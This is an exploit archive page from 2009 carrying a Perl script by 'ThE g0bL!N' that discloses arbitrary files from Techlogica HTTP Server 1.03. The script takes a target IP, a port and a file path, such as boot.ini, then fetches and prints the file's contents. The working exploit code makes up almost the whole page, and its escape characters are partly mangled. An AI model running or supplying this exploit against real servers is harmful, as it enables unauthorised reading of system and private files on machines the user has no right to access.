Techlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Techlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit
# Published : 2009-09-14
# Author : ThE g0bL!N
# Previous Title : Neufbox NB4-R1.5.10-MAIN Persistent XSS Vulnerability
# Next Title : IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit

#!/usr/bin/perl -w
#By ThE g0bL!N
#Download : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/Techlogica-HTTP-Server.shtml
#Happy Ramadan And Happy eid
use LWP::Simple;
use LWP::UserAgent;
print "tTechlogica HTTP Server 1.03 Arbitrary File Disclosure Exploitn";
if(@ARGV < 3)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0  IP Port Filen";
print "[X] Example : perl $0 127.0.0.1 80 boot.inin";
}
($TargetIP, $AttackedPort, $TargetFile) = @ARGV;
print("Please Wait ! Connecting To The Server ......nn");
sleep(5);
print("          ******************************n");
print("          *             Status         *n");
print("          ******************************n");
print("Loading ........................................nnn");
$temp="/";
my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80n");
$Disclosure=get $boom;
if($Disclosure){
print("nnnn............File Contents Are Just Below...........n");
print("$Disclosure n");
}
else
{
print(" Not Found !!!nn");
exit;
}

# www.Syue.com [2009-09-14]